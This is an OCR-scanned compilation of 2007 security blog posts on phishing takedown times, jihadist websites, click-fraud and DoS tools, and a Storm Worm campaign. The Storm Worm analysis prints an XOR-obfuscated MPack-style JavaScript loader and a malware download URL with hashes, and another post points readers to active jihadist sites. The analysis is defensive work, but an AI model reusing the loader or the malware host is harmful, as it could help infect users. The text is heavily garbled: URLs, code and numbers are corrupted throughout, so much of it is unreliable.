Some vendors specialize in [l]clustering phishing attacks to 
better understand the phishing ecosystem and reveal 

all of its nodes. Others too, armed with opportunistic 
business development strategies are [2]developing a market 

segment to provide their customers with services for 
[3]timely shutting down a phishing or malicious web site. 

Symantec recently released informative [4]averages on the 
time a phishing site remains online, confirming the need 

for a such a market segment and prompting the discussion 
on alternative solutions : 













11 Our analysis shows how ISPs in some countries are 
relatively slower than others to shut down attacks. For 
example, Taiwan's average shutdown time has been only 19 
hours on 92 attacks, while in Australia the average for 98 

attacks has been almost one week for a single shutdown. 
Other countries slow to respond include the USA and India. 

Countries identified as responding quickly include Germany, 
Netherlands, Japan, Estonia, Poland and Russia. " 

Moreover, [5]May's report from the Anti-Phishing Working 
Group has an ever better sample consisting of 37438 

unique phishing sites, where the average time online for a 
phishing site was 3.8 days, and the longest time online 

was 30 days. Why are certain ISPs slower in shutting down 
phishing sites compared to the others? What motivates 

the best performing ones to react immediately? It's all a 
matter of perspective. Let's consider the facts : 

- DIY phishing kits such as Rock Phish significantly increased 
the number of phishing sites, but sacrificed effi¬ 
ciency for quality. Rock Phish's major strength is Rock Phish's 
major weakness, namely that of centralization, so the 

phisher ends up with [6]a single IP hosting phishing sites for 
numerous banks. In fact, according to [7]IBM's X-Force, 
single domains were carrying an average of 1000 phishing 
sites 

- Phishing sites hosted at home users PCs are harder to shut 
down compared to those hosted on a web server 
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- Russia is responding faster than the U.S because according 
to the APWG's Countries hosting phishing sites stats, 

Russia's percentage is 7.41 % compared to the U.S 32.41 %. 
We have the same situation with countries hosting 

trojans and downloaders where Russia accounts for 6 % 
compared to China with 22 %. It does not mean Russia is out 

of the game, not at all, but the way you may have a Russian 
phishing/malware campaign hosted in the U.S, you may 

also have a U.S phishing/malware campaign hosted in Russia 

- The lack of incentives for ISPs to be in a hurry and the lack 
of accountability for them if they are not in a 

hurry. Perhaps if the vendors developing the market segment 
for shutting down phishing sites start sharing revenues 

in a win-win-win fashion, it would make a difference if no 
legislations are in place 

- [8]XSS vulnerabilities within E-banking sites often act as 
redirectors, so while you're shutting down the yet 

another .info domain, the XSS is still there waiting to get 
abused 

- In a [9]fast-flux empowered [lOjmalicious economies of 
scale attacks, any stats should be considered at least 

partly "scratching the surface" only due to the fact that, 
while the redirector may be in the U.S, the second one with 
the phishing site may be in Russia, and the third one hosting 
the malware in Taiwan. And so, while you've shut 

down the most obvious nodes, the campaign remains in tact, 
and gets automatically re-mixed to achieve malicious 



diversity using the same domain names, but under different 
and dynamic IPs next time 

What would be the most effective approach for the most 
targeted financial services to protect their customers from 

phishing attacks? Hire brandjacking monitoring services to 
shut down efficiently and persistently, the generated 

phishing sites with DIY phishing kits, educate E-banking 
customers, or do both? Assess their unique situation and 

balance while considerating that [ll]some folks still don't 
know what phishing really is. Now, try explaining to them 

what form input grabbing malware tools such as [12]the 
Nuclear Grabber are. 

Related posts: 

[13] A Client Application for Secure E-banking? 

[14] The Rock Phish Kit in action 

[15] The Brandjacking Index 

[16] Security threats to consider when doing E-banking 

[17] Banking Trojan Defeating Virtual Keyboards 

[18] Defeating Virtual Keyboards 

1. http://ddanchev.blo as pot.com/20Q7/01/clusterin a- 
phishin a -attacks.html 

2. http://ddanchev.blo as pot.com/2007/Q3/take-this- 
malicious-site-down.html 









3. http://ddanchev.blo as pot.com/2007/04/takin a -down- 
ohishin a -sites-business.html 

4. 

http://www.svmantec.com/enterorise/securitv resoonse/webl 
og /2007/07/online_fraud in italv analysis l.html 

5. 

http://www.antiphishin a .or a /reports/apw a report mav 2007. 
pdf 

6. http://ddanchev.blo as pot.com/2006/12/phishin a -donnains- 
hostin a -multiple.html 

7. http://blo a s.iss.net/archive/Phishin a lncreases.html 

8. http://ddanchev.blo as pot.com/2007/02/xss-vulnerabilities- 
in-e-bankin a -sites.html 

9. http://ddanchev.blo as pot.com/2007/Q7/feedin a- packed- 
malware-binaries.html 


10. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

11. http://www.webuser.co.uk/news/news. ph p7id = 125110 

12. http://ddanchev.blo as pot.com/2006/ll/nuclear- a rabber- 
toolkit.html 


13. http://ddanchev.blo as pot.com/2007/05/client- 
ap plication-for-secure-e-bankin a .html 

14. http://ddanchev.blo as pot.com/2007/Q7/confirm-vour- 
a ullibilitv.html 


15. http://ddanchev.blo as pot.com/2007/05/brand i ackin a- 
index.html 































































16. http://ddanchev.blo as pot.com/2006/01/securitv-threats- 
to-consider-when.html 
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17. http://ddanchev.blo as pot.com/2006/09/bankin a -tro i an- 
defeatin a -virtual.html 

18. http://ddanchev.blo as pot.com/2007/05/defeatin a -virtual- 
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GIMF Now Permanently Shut Down (2007-08-03 
13:29) 

That was fast, and we could easily start talking about the 
average time it took to shut down [l]cyber jihadist com- 




















munities like these. On Tuesday after I pointed out that it 
took a month [2]to shut down GIMFs English and German 

version blogs, and how they've switched to a third one, 

[3]it's now down too, for less than 48 hours. Limiting cyber 
jihadists opportunities to operate and develop online 
communities is directly undermining their supporters' 
confidence 

in GIMF's ability to remain online. And despite that the blogs 
have been around for quite a while taking advantage 

of an effective one-to-many communication model, they're 
now finally down. Intact, however, still remain [4]Jihad 

Fields are Calling! with their eye catching [5]Jihadist 
Wallpapers Gallery, and the [6]Caravan of Martyrs with 
another 

[ 7 ]J i had ist Gallery worth checking out, especially the 
comments within. 

1. http://ddanchev.blo as pot.com/2007/Q6/list-of-terrorists- 
blo a s.html 

2. http://ddanchev.blo as pot.com/2007/07/ a imf-switchin a- 
blo a s.html 

3. http://albattarmedia.wordpress.com/ 

4. http://mu i ahidfisabeelillah.wordpress.com/ 

5. http://mu i ahidfisabeelillah.wordpress.com/ i ihad- 
waN papers/ 

6. http://caravanofmartvrs.wordpress.com/ 

7. http://caravanofmartvrs.wordpress.com/ a aller v/ 
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Delicious Information Warfare, Friday, 3rd (2007-08- 
03 14:48) 

It's time for this week's research papers, tools and services 
worth going through. Catch up with [l]last week's content, 
stay informed, and keep in mind that the most prolific threat 
of them all is the lack of a decent situational awareness. 

Papers and Publications : 

[2] Presentations and White Papers from Black Hat 2007 

11 The entire collection of presentations and white papers per 
researcher from this year's Black Hat Con. " 

[3] Netcat for the Masses 

11 Having had numerous people recently ask me about the 
various uses for Netcat I decided to put together a document 
showing a few handy uses for good oi' Netcat. Netcat has 
been described as telnet on steroids or a Swiss army knife, 
both excellent descriptions for this versatile little tool. " 

[4] Spam Report May 2007 

" In May, spam accounted for 70 % - 80 % of all email traffic 
on the Russian Internet. No major fluctuations were 




observed. Spam reached a high of 86 % of all email traffic on 
May 28th, and hit a low of 65.4 % on May 21. " 

[5] HowTo Harden PHP5 With Suhosin On Fedora 7 

" Suhosin is an advanced protection system for PHP 
installations that was designed to protect servers and users 
from known and unknown flaws in PHP applications and the 
PHP core. Suhosin comes in two independent parts, that can 

be used separately or in combination. The first part is a 
small patch against the PHP core, that implements a few 

low-level protections against bufferoverflows or format string 
vulnerabilities and the second part is a powerful PHP 

extension that implements all the other protections. " 

[6] Microsoft UK Events Website Hacked 

11 A detailed analysis how the website was hacked and how it 
could have been avoided." 

[7] lmplementing Effective Vulnerability Remediation 
Strategies Within the Web Application Development Life- 

cycle 

" Once you've completed a security assessment as a part of 
your web application development, it's time to go down the 
path of remediating all of the security problems you 
uncovered. At this point, your developers, quality assurance 
testers, auditors, and your security managers should all be 
collaborating closely to incorporate security into the current 
processes of your software development lifecycle in order to 
eliminate application vulnerabilities. 11 



[8] Defend Your Code with Top Ten Security Tips Every 
Developer Must Know 

" There are many ways to get into trouble when it comes to 
security You can trust all code that runs on your network, 
give any user access to important files, and never bother to 
check that code on your machine has not changed. You 
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can run without virus protection software, not build security 
into your own code, and give too many privileges to too 
many accounts. You can even use a number of built-in 
functions carelessly enough to allow break-ins, and you can 

leave server ports open and unmonitored. Obviously, the list 
continues to grow. " 

[9] Security Testing Enterprise Messaging Systems 

11 This paper discusses potential security weaknesses that 
may be present in messaging systems either as a result of 
software flaws, application design or the misconfigurations 
of services. It focuses on TIBCO Rendezvous, as an 

example of a commonly used enterprise messaging system. 
Recommendations are then presented which mitigate 

these security issues. " 

[10] How to Cheat at Configuring Open Source Security Tools 
- book excerpt 

11 The perfect book and companion Web site for multi-tasked 
security professionals and IT managers responsible for 
securing corporate networks using the 10 most popular toots 
including: Snort, Nessus, Wireshark, Nmap, and Kismet 



on Windows, Linux, or Max OS X. " 

[11] Controlling Website Account Information 

11 When creating a website that requires authentication, the 
designer must keep in mind that passwords should be stored 
in an encrypted format. There must also be a password 
policy set before launching the site; this could include the 
password requirements as well as how the website and 
webmaster should control user passwords. The last 

decision to be made is how access will be granted to the 
users; this includes how they will provide credentials, how 
their credentials will be authenticated, and how to track the 
user's authentication from one page to another. " 

[12] Security Data Visualization - book excerpt 

11 In Security Data Visualization, the author creates graphical 
windows into the world of computer security data, revealing 
fascinating and useful insights into networking, 
cryptography, and file structures. After learning how to 
graph and display their data correctly, readers will be able to 
understand complex data sets at a glance. " 

[13] US-CERT Quarterly Trends and Analysis Report, Vol. 2, 
Issue 2 

11 This report summarizes and provides analysis of incident 
reports submitted to US-CERT during the U.S. Government 
fiscal year, 2007 second quarter (FY07 Q2). 11 

Security Tools : 

[14] BotHunter 

11 BotHunter is a passive traffic monitoring system, which ties 
together the dialog trail of inbound intrusion alarms with 



those outbound communication patterns that are highly 
indicative of successful local host infection. When a 

sequence of in and outbound dialog warnings are found to 
match BotHunter's infection dialog model, a consolidated 

report is produced to capture all of the relevant events and 
event sources that played a role during the infection 
process. " 

[15] PDFassassin 

11 PDFassassin is a module for SpamAssassin that allows for 
the scanning of PDF files in email message attachments. 

Email bodies are scanned upon connection and checked for 
PDF attachments. Text is extracted from the PDF via 

pdftotext and scanned by SpamAssassin. Should the PDF 
contain images, the goer program is called to extract the 

text content. 11 

[16] Advanced Checksum Verifier (ACSV) vl.5.0 

11 The [17] Advanced Checksum Verifieris an handy and fast 
windows utility for verifying integrity of files by using the 

[18] CRC32or [19] MD5checksum calculation algorithms for 
Windows users. It will allow you to verify the accuracy of 
your data after you burn a CD or transfer a files over a 
network. Adding an little checksum file to your data files will 
381 

allow in further easily to verify their integrity at any time. 11 
[20]Blue Pill Project 



11 The New Blue Pill is significantly different from the original 
Blue Pill, not only because of the various features that it 
implements, but also because of the different architecture it 
was based on (HVM-iike approach, similar to that used by 
XEN 3). 11 

[21] PyFault - Python Based Fault Injection in Win32 Based 
Application 

" PyFault is a python library aimed at fault injection scenarios 
in Win32 based applications. Currently it only implements a 
DLL injection and ejection mechanism, but we aim to add 
more functionality to it, and of course all requests are 
welcome. " 

[22] Astaro Security Linux 6.311 

11 Astaro Security Linux is an all-in-one network security 
gateway that includes a firewall, intrusion protection, virus 
protection, spam protection, URL filtering, and a VPN 
gateway. Features include stateful packet inspection, deep 

packet filtering, intrusion detection and prevention, portscan 
detection, content filtering, virus detection for email and 
Web traffic, profile handling, IPSec, SSL, and PPTP VPN 
tunneling, spam blocking, proxies for HTTP, FTP, POP3, SMTP, 
DNS, VoIP, SOCKS, and Ident, logging, and reporting. 11 

[23] EasylDS v0.2 

11 EasyIDS is an easy-to-install intrusion detection system 
based upon Snort. EasyIDS is designed for the network 
security beginner. EasyIDS includes CentOS Linux, Snort, 
MySQL, BASE, ntop, oinkmaster, and more. " 


[24]Trace Explorer 



11 Trace Explorer aggregates traceroutes to many popular 
websites and makes them searchable, allowing you to 

discover which web sites are hosted near each other, at a 
particular ISP, or behind a specific router. " 

[25] SAGATOR 

11 SAGATOR is an email antivirus/antispam gateway It is an 
interface to any smtpd, which runs an antivirus and/ or spam 
checker. Its modular architecture can use any combination of 
antivirus/spam checker according to configuration. 

it currently supports clamav, nod3 2d, AVG, soph os, 

Trend Micro AV, Symantec AV, spamassassin, bog o filter, and 

quickspamfilter. 11 

[26] Firefox: 10 tips to bolster your privacy 

11 In this hack, we're going to highlight 10 tips to bolster your 
privacy when surfing the Internet with Fire fox. You can use 
any of these tips to add an extra layer of privacy to your 
browsing at work, on public computers or just on a 

shared computer at home. 11 

[27] Binary Tools 

11 reverse: takes the input file, reverses it (first byte becomes 
last byte, ...) and writes it to a new file, middle: extracts a 
sequence of bytes from the input file and writes it to a new 
file. " 

[28] IM-Filter 

11 IM-Filter is a daemon that runs on a firewall and fitters ICQ 
traffic. The daemon can identify file transfers, handle UIN 



and word blacklists, manage a list with currently logged in 
users, and log messages sent via the ICQ protocol. " 

[29]Jesse's JavaScript compiler/decompiler fuzzer 

11 This fuzzer constructs random strings with JavaScript 
statements andexpressions (sometimes with syntax errors), 
and asks the JavaScript engine totreat them as functions. " 
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[30J50+ Firefox Add-ons For Security and Privacy 

11 While these issues are best fixed with a soon-to-be- 
released patch*, we were inspired to look at the wider issue 
of keeping your Firefox browser secure. We present a 
plethora of security extensions for Firefox, followed by those 
that will keep your private data....private. " 

[31]The Crypto CD 

11 CryptoCD is a collection of software that provides secure 
communication through the Internet. The programs cover 
tasks like email encryption, secure chat, and anonymous 
Web browsing. " 

[32JGMER 

11 GMER is an application that detects and removes [33] 
rootkits. " 

[34]RenaissanceCore 0.9.0 

11 The RenaissanceCore IDS consists of four components: a 
stateful IDS sensor, a graphical user interface, a database 
backend, and a two-way interface between the IDS sensors 
and the database. Each component can run on a separate 



Sevices & Misc : 


[35] The Pwnie Awards 

11 An annual award ceremony celebrating (or making fun of) 
the achivements and failures of security researchers and the 
wider security community " 

[36] USB patch released. HALLELUJAH! 

11 The patch was written for and, therefore, tested on Apple 
TV software version 1.0. If you have 1.1, the patch might not 
work. Please let us know if you can get the patch to work on 
1 . 1 . " 

[37] Wordpress ZeroDay Vulnerability Roundhouse Kick and 
why I nearly wrote the first Blog Worm (updated) 

11 Much time has passed since I wrote the last [38] Full 
DisciosurePubiication on this Blog, it was about the [39] 
security vulnerability in Akismet, a Word press antispam 
plugin. This time you will witness something which impacts 
huge 

parts of the Blogosphere, I will tell you my story. " 

[40]The Story of DEFCON - Video 

11 Jeff Moss, the founder of DEFCON and Black Fiat, tells the 
history of the largest hacker conference and how it ail got 
started. Find out more about the early days of the hacking 
scene when dial-up was considered fast, how the 

security space changed around the conference as years 
went by, and discover some bizarre things that take place at 
the event. " 



1. http://ddanchev.blo as pot.com/2007/07/delicious- 
i nformation-warfare-saturdav.html 

2. htt p://164.106.251.250/docs/netsec/bh2007/ 

3. 

http://www.infosecwriters.com/text_resources/pdf/Netcat_for_ 
the Masses DDebeer.odf 

4. http://www.viruslist.com/en/analvsis7pubid = 204791953 

5. http://www.howtofor a e.com/ oh p suhosin fedora7 

6. http://www.windowsecuritv.com/articles/Microsoft-UK- 
Events-Website-Hacked.html 

7. 

http://www.infosecwriters.com/text resources/odf/Effective 
Web A p p Vuln Remediation Article2 CSima.pdf 

8 . 

http://msdn.microsoft.eom//msdnma a /issues/02/09/securit vti 

ps/default.as ox 

9. 

http://packetstormsecuritv.or a/pa pers/evaluation/Securitv_Te 

stin a _Enterprise_Messa aina_S vstems.pdf 

10 . 

http://www.s vna ress.com/book_catalo a /sample_1597491705. 

pdf 

11 . 

http://www.infosecwriters.com/text resources/odf/Controllin g 
Website Account lnformation AColson.pdf 


12. http://nostarch.com/download/securitvviz ch05.pdf 









































383 


13. http://www.us- 

cert. a ov/press room/trendsandanalvsisQ207.pdf 

14. http://www.cvber-ta.or a /BQtHunter/ 

15. http://blo g .atmail.com/?p=61 

16. http://www.irnis.net/soft/acsv/ 

17. http://www.irnis.net/files/acsvi.exe 

18. http://www.irnis.net/ g loss/crc32.shtnnl 

19. http://www.irnis.net/ g loss/md5-di g est.shtml 

20. http://www.bluepillpro i ect.or g/ 

21. http://vdalabs.com/tools/ p vfault.html 

22. http://www.astaro.com/ 

23. http://www.skvnet-solutions.net/easvids/ 

24. http://www.linuxhaxor.net/2007/08/03/trace-explorer/ 

25. http://www.salstar.sk/sa g ator/ 

26. http://www.securitv-hacks.com/2007/06/08/firefox-10- 
ti ps-to-bolster-vour-privac v 

27. http://didierstevens.wordpress.com/pro g rams/binar v- 
tools/ 

28. http://im-filter.sourcefor g e.net/ 

29. https://bu g zilHa.mozilla.or g /show bu g.cg i?id = i sfunfuzz 

















































30. http://mashable.com/2007/07/25/firefox-securit v/ 
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33. http://en.wikipedia.or a /wiki/Rootkit 
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39. 

http://mvbeni.rootzilla.de/mvbeNi/2007/wordpress akismet 
xss security flaw beware of the do a/ 

40. http://www.voutube.com/watch7vH a 6bOMT i HCE 


384 












































A Commercial Click Fraud Tool (2007-08-08 16:35) 

India's secret [l]army of "ad clickers" employed on a revenue 
sharing basis is an already well known threat to the future 
online advertising, especially with its cost-effective model of 
[2]outsourcing click fraud to human clickers, and while the 
public's attention is always orbiting around [3]the use of 
botnets to commit click fraud, in the vary same 

way we have [4]malware pretending to be a RAT, and 
[5]spamming tools pretending to be email verification ones, 

we also have commercially available web clickers, while 
they're in fact click fraud tools. Click, click, click, or click 



















once only to have a web clicker automatically aggregate and 
verify working proxies in between launching multiple threads 

against a web site presumably owned by the clicker? And no 
botnet needed? A commercial click fraud tool called, 

well, [6]the Web Clicker: 

11 uses public proxies to load and click those banners. 
Advertisement systems will recognize every proxy as a 
single unique user clicking on the banner.Server 
administrators have to get aware of this heavy security hole, 
as customers may use this program to earn hundreds of 
dollar a month! You as a server administrator and software 
developer 

have the opportunity now to test your own servers to 
improve protection and to detect possible cheating 
schemes.If you need additional information, check the links 
below or try WebClicker right now! You can take a look at 
some 

[7] WebClicker screenshotsfirst if you like. " 

In previous posts M [8]Latest Report on Click Fraud", and 11 
[9]AdSense Click Fraud Rates", I pointed out that click 385 




fraud has become so evident that: 

" Third party companies emerged and started filling the 
niche by coming up with dick fraud analytics software so 
that Google's major customers, even the small to mid-size 
business could take advantage of an automated way to 
analyze 

dick anomalies. " 

And while Google are publicly admitting that click fraud is a 
fact and commissioning [10]third-party analysis of their 
actions to detect and prevent it, such commercially available 
tools require no botnets, but a minor investment in 






























proxy servers providing service, and the software itself. 
Finally, India's army of "ad-clickers" will achieve fraudulent 
economies of scale if empowered with such tools. Some 
issues to keep in mind : 
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- The tool can be used as a click fraud assessment one, so 
that ad networks can verify their susceptibility to such 

applications, or webmasters the detection rate of their 
[ 11 ]click fraud analyzing solution. The main concern is that 

the tool is sold on a volume basis, so malicious parties can 
easily obtain it in between the ones they're already using 

- Each and every security vendor has a huge database of 
malware infected, spam and phishing emails sending IPs, 

and while they're already figuring out ways to commercialize 
these databases, an ad network could greatly benefit by 



integrating such data within their system and thinking twice 
before counting a click from these hosts 

- The more the advertiser is aware of the click fraud problem, 
the more would her requirements and expectations 

become. If advertising networks based on a CPC model don't 
build better awareness on their mitigation practices, 

the entire CPC ad model is at stake 

Here are some tips on [ 12]DIY click fraud prevention, 
[13]Yahoo's and Google's comments on the latest report 
released 

by Click Forensics, [14]a report on Combating Click Fraud 
with interesting perspectives on the possible tactics, and a 
very in-depth analysis of [15]advertising models and how 
fraudulent publishers benefit from them. 

Overall click fraud rate per quarter courtesy of the [16]Click 
Fraud Network. 

1. http://timesofindia.indiatimes.com/articleshow/msid- 
654822 . cur pg -l.cms 

2. http://www.indiana.edu/%7Ephishin a/pa pers/ a andhim.pdf 

3. http://www.informationweek.com/news/showArticle. i html? 
articlelD=201002161 

4. http://ddanchev.blo as pot.com/2007/07/shark2-rat-or- 
malware.html 

5. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malidous-wild-west-sample.html 


6. http://www.headstron a .de/software-webclicker.shtml 






















7. http://www.headstron a .de/software-webclicker-sh.shtml 


8. http://ddanchev.blo as pot.com/2006/07/latest-report-on- 
click-fraud.html 


9. http://ddanchev.blo as pot.com/2007/03/adsense-click- 
fraud-rates.html 


10. http:// a oo a leblo a .blo as pot.com/pdf/Tuzhilin_Report.pdf 

11 . 

http://www.clickforensics.com/products/clickforensics/reports 

.htm 


12. http://searchen a ineland.com/070807-0757Q7. php 

13. 

http://www.forbes.com/technolo a v/2007/07/22/clickfraud- 
aooa le-vahoo-tech-cx pco 072Qpaidcontent.html 

14. http://www.researchandmarkets.com/reports/c63978 
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http://www.cs.ucsb.edu/research/tech reports/reports/2006- 
06.pdf 
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http://clickfraudnetwork.com/content/ClickFraudlndex.as px 
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A Cyber Jihadist DoS Tool (2007-08-08 21:25) 

I've seen [l]mail bombers courtesy of Chinese hacktivists 
released during the [2]China/U.S cyber skirmish, ^en¬ 
cryption tools released by cyber jihadists, and now we have a 
fully working multi-thread HTTP GET flooderfor 

attacking "infidel" sites as the authors put it. The tool itself 
and the tutorial pointing to ping flooders circa 1999 

aren't disturbing. What's disturbing is the time when cyber 
jihadists stop re-inventing the wheel to achieve a better 

branding effect, and start [4]outsourcing their DDoS needs to 
groups who are vulnerable to a single weakness only - 

lack of ethics and the financial proposition they'll get. The 
numbers within the screenshot are part of a descriptive 

tutorial on how to use the tool, which is a part of the cyber 
jihadists' al-jinan.org DDoS initiative, so basically once cyber 














jihadists download E-jihad, the tool periodically "phones 
home" to obtain IPs of sites to be attacked and included in 
the DoS tool. [5]Here's more info : 

11 The "Electronic Jihad Program" is part of the long-term 
vision jihadi Web site Ai-jinan.org has to use 389 



the internet as a weapon, something that affects any 
organization that relies on the Web. Electronic Jihad allows 

users to target specific IP addresses for attack in order to 
take any servers running at those IP addresses offline. The 
application even includes a Windows-like interface that lets 
users choose from a list of target Web sites provided via the 
Al-jinan site, select an attack speed (weak, medium, or 
strong), and the dick on the "attack" button. " 

Moreover, despite that the al-jinan.org's "Electronic Jihadists 
Against Infidel Sites" campaign is shut down, the initiative is 
constatly switching locations, and is currently active at 
another domain. Compared to aj-jinan.org's 













E-jihad app that was distributing the IPs to be attacked, this 
campaign only recomments the use of a ping flooder. 

You can also amuse yourself wih this [6]attack technique. 
The idea is to open 5 IFRAMEs, and reload them every 5 

seconds, the site under "iframe attack" is islam-in-focus.com. 
Aspirational initiative, with thankfully lame execution. 

1. http://ddanchev.blo as pot.com/2006/Q9/chinese-hackers- 
attackin a -us.html 

2 . 

http://www.cmc. g ov.mv/what we do/ins/IndustrvTalk/Present 
ationl.pdf 

3. http://ddanchev.blo as pot.com/2007/04/mu i ahideen- 
secrets-encr v ption-tool.html 

4. http://ddanchev.blo as pot.com/2007/05/ddos-on-dennand- 
vs-ddos-extortion.html 

5. 

http://www.informationweek.com/shared/printableArticle. iht 
ml?articl el 0=200001943 

6. http://members.lvcos.co.uk/dsl66/ paa e6/dsll.html 
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<Script Language^'JauaScript’> Function xor_str(plain_str, xor_key){ uar xored_str = 

For (uar i = 0 ; i < plain_str.length; ++i) xored_str += String.FronCharCode(xor_key 
plain_str.charCodeflt(i)); return xored_str; > uar plain_str = 

"\x5c\x76\x76\x0a\x1d\x0e\x5c\x11\x11\x5c\x41\x5c\x12\x19\x0b\x5c\x3d\x0e\x0e\x1d\x05\x54\x5 
\x76\x0a\x1d\x0e\x5c\x11\x19\x11\x23\x1a\x10\x1d\x1b\x5c\x41\x5c\x4c\x47\x76\x76\x1a\x09\x12 
x08\x15\x13\x12\x5c\x14\x54\x5S\x5c\x07\x11\x11\x41\x11\x11\x47\x5c\x0F\x19\x08\x28\x15\x11\ 
13\x09\x08\x54\x5e\x14\x54\x55\x5e\x50\x5c\x4e\x4c\x4c\x4c\x55\x47\x01\x76\x76\x1a\x09\x12\x 
8\x15\x13\x12\x5c\x1b\x19\x08\x1e\x54\x1e\x50\x5c\x1e\x2F\x15\x06\x19\x55\x76\x07\x0b\x14\x1 
\x19\x5c\x54\x1e\x52\x10\x19\x12\x1b\x08\x14\x56\x4e\x40\x1e\x2F\x15\x06\x19\x55\x07\x1e\x5c 
x41\x5c\x1e\x47\x01\x76\x1e\x5c\x41\x5c\x1e\x52\x0F\x09\x1e\x0F\x08\x0e\x15\x12\x1b\x54\x4c\ 
1e\x2F\x15\x06\x19\x53\x4e\x55\x47\x0e\x19\x08\x09\x0e\x12\x5c\x1e\x47\x01\x76\x76\x1a\x09\x 
F\x08\x15\x13\x12\x5c\x1F\x1a\x54\x55\x76\x07\x0a\x1d\x0e\x5c\x06\x1F\x5c\x41\x5c\x4c\x04\x4 
\x4c\x1F\x4c\x1F\x4c\x1F\x47\x76\x0a\x1d\x0e\x5c\x1d\x5c\x41\x5c\x09\x12\x19\x0F\x1F\x1d\x0c 
x54\x5e\x59\x09\x48\x4F\x48\x4F\x59\x09\x48\x4F\x48\x4F\x59\x09\x4c\x1a\x19\x1e\x59\x09\x4F\ 
49\x1e\x59\x09\x4a\x4a\x1F\x45\x59\x09\x44\x4c\x1e\x45\x59\^09\x44\x4c\x4c\x4d\x59\x09\x19\x 
F\x4F\x5e\x5c\x57\x76\x5e\x59\x09\x19\x4e\x48\x4F\x59\x09\x19\x1e\x1a\x1d\x59\x09\x19\x44\x4 
\x59\x09\x1a\x1a\x19\x1F\x59\x09\x1a\x1a\x1a\x1a\x59\x09\x44\x1e\x4b\x1a\x59\x09\x18\x1a\x48 
x59\x09\x19\x1a\x19\x1a\x59\x09\x4a\x48\x19\x1a\x59\x09\x19\x4F\x1d\x1a\x59\x09\x45\x1a\x4a\ 
59\x09\x48\x4e\x1a\x4F\x59\x09\x45\x1a\x4a\x48\x59\x09\x4a\x19\x19\x4b\x59\x09\x19\x1a\x4c\x 
9\x09\x19\x1a\x19\x1e\x5e\x5c\x57\x76\x5e\x59\x09\x4a\x48\x19\x1a\x59\x09\x1e\x45\x4c\x4F\x5 
\x4a\x4d\x44\x4b\x59\x09\x19\x4d\x1d\x4d\x59\x09\x4c\x4b\x4c\x4F\x59\x09\x19\x1a\x4d\x4d\x59 
x19\x1a\x19\x1a\x59\x09\x1d\x1d\x4a\x4a\x59\x09\x1e\x45\x19\x1e\x59\x09\x4b\x4b\x44\x4b\x59\ 
4a\x49\x4d\x4d\x59\x09\x4c\x4b\x19\x4d\x59\x09\x19\x1a\x4d\x1a\x59\x09\x19\x1a\x19\x1a\x59\x 
d\x1d\x4a\x4a\x59\x09\x1e\x45\x19\x4b\x5e\x5c\x57\x76\x5e\x59\x09\x1F\x1d\x44\x4b\x59\x09\x4 
\x49\x1a\x59\x09\x4c\x4b\x4e\x18\x59\x09\x19\x1a\x4c\x18\x59\x09\x19\x1a\x19\x1a\x59\x09\x1d 
x4a\x4a\x59\x09\x1e\x45\x19\x4F\x59\x09\x4c\x4c\x44\x4b\x59\x09\x4c\x1a\x4e\x4d\x59\x09\x4c\ 
44\x1a\x59\x09\x19\x1a\x4F\x1e\x59\x09\x19\x1a\x19\x1a\x59\x09\x1d\x1d\x4a\x4a\x59\x09\x1e\x 
a\x1a\x59\x09\x4e\x19\x44\x4b\x59\x09\x4c\x1d\x45\x4a\x5e\x5c\x57\x76\x5e\x59\x09\x4c\x4b\x4 
\x59\x09\x19\x1a\x4e\x45\x59\x09\x19\x1a\x19\x1a\x59\x09\x1d\x1d\x4a\x4a\x59\x09\x1d\x1a\x1a 
x59\x09\x18\x4b\x4a\x1a\x59\x09\x45\x1d\x4e\x1F\x59\x09\x4a\x4a\x4d\x49\x59\x09\x1a\x4b\x1d\ 
59\x09\x19\x44\x4c\x4a\x59\x09\x19\x1a\x19\x19\x59\x09\x1e\x4d\x19\x1a\x59\x09\x45\x1d\x4a\x 
9\x09\x4a\x48\x1F\x1e\x59\x09\x19\x1e\x1d\x1d\x59\x09\x19\x19\x44\x49\x5e\x5c\x57\x76\x5e\x5 


The Storm Worm Malware Back in the Game (2007- 
08-09 15:24) 

After coming across the story on how [l]Storm Worm is 
taking over the world for yet another time, I wondered - 

who are the novice malware authors behind Storm Worm that 
[2]switch tactics by the time their old ones become 

inefficient? After commenting on [3]the first Storm Worm 
wave - it's not even a worm - with an emphasis of the 

outdate social engineering techniques it was using back in 
January, 2007, it's time we assess the current situation 


and how have Storm Worm evolved. What has changed? 
Direct .exe email attachments matured into a direct 



link to an infected IP address. Mass mailings are now sent 
with campaign ID to measure efficiency. Outdated 

social engineering tactics became a direct exploitation of old 
and already patched vulnerabilities to ensure a higher 

probability of infecting the visitor whose lack of 
understanding on how client side vulnerabilities should get a 
higher priority compared to visual .exe vigilance often result 
in an infection. Here's a sample infected IP spreading Storm 

Worm binaries : 

Message content : 11 Your Download Should Begin Shortly. 

If your download does not start in approximately 15 

seconds > you can dick here to launch the download' 

Original URL : 77.96.240.142 /? 
232c3a9ebeed435601e5ee71 

Binary URL : 77.96.240.142/ecard .exe 

Server response : HTTP/1.1 200 OK 

Server: nginx/0.5.17 

Date: Thu, 09 Aug 2007 00:12:15 GMT 

Content-Type: text/html 

Transfer-Encoding: chunked 

X-Powered-By: PHP/5.2.1 
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Email spoofed from : "postcards.com" jyg @ alltel.net 



Mail server : exchange.moneytreemortgage.biz, 
[4]64.220.230.118 

IP blacklisted by : SpamCop, CASA-CBL, UCEPROTECTL1, 
PSBL 

Sender's IP : 73.208.110.36 

IP blacklisted by : Spamhaus PBL, NJABL Dynablock 
ecard.exe 

Detection rate : 17 AVs out of 32 detect it (53.13 %) 

File size: 113195 bytes 

MD5: 63fe9896fbbca6471ec216c9dee0b0e9 

SHA1: 170eb66ca28f74d291e07a0383564b465d373f06 

file.exe - downloader 

Detection Rate: 17 AVs out of 32 detect it (53.13 %) 

File size: 4608 bytes 

MD5: 7ea2baadfe3a8a54635cea72526ff391 

SHA1: ae32bb7df491fb52650144931cl0a7bd5ebf6a2c 

alt.exe 

Detection Rate : 17 AVs out of 32 detect it (53.13 %) 

File size: 113168 bytes 

MD5: 4ac8a3242e945215469ec08bc5603418 


SHA1: 75b8aadab3626e39b570d7e7494d3be63cc582dl 



At every infected IP acting as a web server, we have a typical 
[5]MPack style XOR-ifying javascript obfuscation. 

And while it's not that hard to deobfuscate it, the interesting 
part is the type of vulnerabilities exploited to 

obtain the downloader and the payload. The current 
